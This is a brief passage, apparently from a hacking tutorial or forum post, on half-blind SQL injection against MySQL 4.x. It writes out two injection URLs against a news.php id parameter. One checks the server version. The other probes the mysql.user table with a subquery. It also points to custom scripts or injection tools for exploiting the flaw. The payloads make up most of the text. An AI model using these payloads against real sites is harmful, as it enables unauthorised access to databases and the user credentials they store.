So no arbitrary data alteration here. But in case of mysql 4.x you can use subqueries feature for fetching any data from database. Code: /news.php?id=1+AND+LENGTH(@@version)>3 Code: /news.php?id=1+AND+(SELECT+COUNT(*)+FROM+mysql.user)>0 This is half-blind sql injection, it's not easy to exploit - you must have custom script written or use some sql injection tools.
